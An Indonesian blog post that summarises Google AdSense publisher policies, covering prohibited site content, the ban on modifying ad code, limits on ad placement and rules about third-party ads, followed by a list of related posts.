Tidak diperbolehkan untuk mempromosikan situs yg memasang ad units AdSense melalui spam ataupun cara2 yg tidak benar pada situs lain.

Tidak diperbolehkan untuk memberi komisi kepada pengunjung untuk mengklik iklan ataupun melakukan search pada Google For Search.

Tidak diperbolehkan untuk memasang label di atas ad units AdSense yg dapat menyebabkan kesalahpahaman. Sebagai contoh, ad units boleh ditandai dengan “Sponsored Links”, tapi tidak dengan “Favorite Sites”.


Isi Situs


Publisher hanya diperbolehkan untuk memasang iklan AdSense pada situs2 yg mengikuti aturan Google, selain itu, iklan tidak boleh dipasang pada halaman dimana isi utamanya menggunakan bahasa yg tidak didukung oleh Google AdSense (termasuk Indonesia).


Ad unit AdSense tidak boleh dipasang pada situs yg mengandung:


Kekerasan, rasis, atau saran untuk melawan/membenci orang lain, grup, maupun organisasi.

Pornografi dan hal2 yg bersifat dewasa.

Hacking/cracking.

Obat2an terlarang.

Kata2 kotor yg berlebihan.

Judi dan kasino.

Ajakan atau tawaran komisi/kompensasi kepada pengunjung untuk mengklik iklan atau tawaran, melakukan search, membrowsing situs (autosurf, paid-to-surf, dll), maupun membaca email (paid-to-read email).

Penggunaan kata kunci yg berulang, berlebihan, maupun tidak relevan dengan situs, baik pada content maupun kode halaman (HTML).

Menipu atau memanipulasi isi halaman untuk meningkatkan ranking mesin pencari dari situs yg bersangkutan.

Menjual atau menawarkan senjata maupun amunisinya.

Menjual atau menawarkan bir atau minuman dengan kadar alkohol tinggi.

Menjual atau menawarkan rokok atau produk2 yg berhubungan dng rokok.

Menjual atau menawarkan obat2an terlarang.

Menjual atau menawarkan replikasi atau imitasi dari suatu produk.

Menjual atau menawarkan tugas kuliah, skripsi, dan sejenisnya.

Berisi atau mempromosikan hal2 yg bersifat ilegal / melanggar hukum.


Materi Yg Dilindungi Hukum


Publisher tidak diperbolehkan untuk memasang ad units AdSense pada situs yg berisi materi2 yg dilindungi oleh hukum, kecuali mereka memiliki ijin untuk itu. Hukum yg digunakan adalah hukum DMCA, mengenai digital media.

Aturan Webmaster


Publisher AdSense diwajibkan untuk memenuhi aturan kualitas webmaster yg tercantum pada http://www.google.com/webmasters/guidelines.html.

Penggunaan Situs dan Iklan


Situs yg menggunakan iklan AdSense disarankan untuk memiliki navigasi yg mudah untuk pengunjung dan tidak mengandung pop-up yg berlebihan. Pemasangan kode AdSense juga harus sesuai dengan yg diberikan, tanpa adanya modifikasi apapun. Ini termasuk tidak diperbolehkannya untuk mengubah perilaku / cara kerja iklan dalam bentuk apa pun.


Situs yg menggunakan ad units AdSense tidak boleh menggunakan pop-up atau pop-under yg mengganggu pengunjung, menarik minat pengunjung, merubah setting browser, me-redirect pengunjung ke situs lain, maupun melakukan proses download.

Kode AdSense harus dipasang sesuai dng yg diberikan tanpa adanya modifikasi. Publisher tidak diperbolehkan untuk mengubah bagian apapun dari kode tersebut atau merubah cara kerja kode, pentargetan, ataupun penampilan iklan. Sebagi contoh, klik pada iklan AdSense tidak boleh terbuka pada jendela browser baru.

Situs atau suatu perusahaan tidak diperbolehkan untuk menampilkan iklan AdSense, search box AdSense, hasil pencarian, dan tombol referral pada aplikasi / software apapun, termasuk toolbar.

Situs yg menggunakan iklan AdSense tidak boleh mendapatkan trafik dari situs / software lain dengan cara2 yg tidak alami, seperti pop-up, redirect, dan sejenisnya.

Penawaran referral harus dilakukan tanpa adanya tawaran atau perjanjian tertentu dengan pengunjung. Publisher juga tidak diperbolehkan untuk meminta alamat email dari pengunjung yg menjaid referral AdSense mereka.


Penempatan Iklan


AdSense menawarkan beberapa format iklan yg dapat digunakan oleh publisher. Publisher disarankan untuk bereksperimen dengan berbagai penempatan iklan, tanpa melanggar aturan2 berikut:


Maksimal tiga ad units dalam satu halaman.

Maksimal dua search box Google AdSense for Search dalam satu halaman.

Maksimal satu link units dalam satu halaman.

Maksimal dua referral units dari masing2 produk referral yg ada.

Hasil pencarian AdSense for Search hanya boleh ditampilkan pada halaman yg mengandung maksimal satu link units.

Tidak diletakkan pada pop-up, pop-under, maupun email.

Tidak ada elemen halaman apapun yg menutupi sebagian/seluruh bagian iklan.

Iklan AdSense apapun tidak boleh diletakkan pada halaman yg tidak berisi apa2.

Iklan AdSense apapun tidak boleh diletakkan pada halaman yg dibuat sepenuhnya dalam rangka untuk menampilkan iklan (MFA), tidak peduli apakah isi halaman tersebut relevan atau tidak.


Iklan atau Layanan Dari Pihak Lain


Untuk menghindari kebingungan pengunjung, Google tidak memperbolehkan untuk memasang iklan maupun search box AdSense pada situs yg juga mengandung iklan maupun search box dari pihak lain yg menggunakan format tampilan (bentuk, ukuran, dan warna) yg sama dengan iklan dan search box AdSense yg ada di halaman tersebut.


baca disini untuk tau pendapatan dan cara pembayaran Google adsense, juga penjelasan singkat tentang Google adsense


Related Posts by Categories - Postingan Sejenis :
google adsense
Dowload Kumpulan Ebook Gratis Adsense
Iklan Google Adsense Tidak Muncul lagi Di Blog Bahasa Indonesia
5 Tips To Increase Our CTR for Google Adsense
Google Release "Google Ad Manager" For Publisher
TOS Baru dari Google Adsense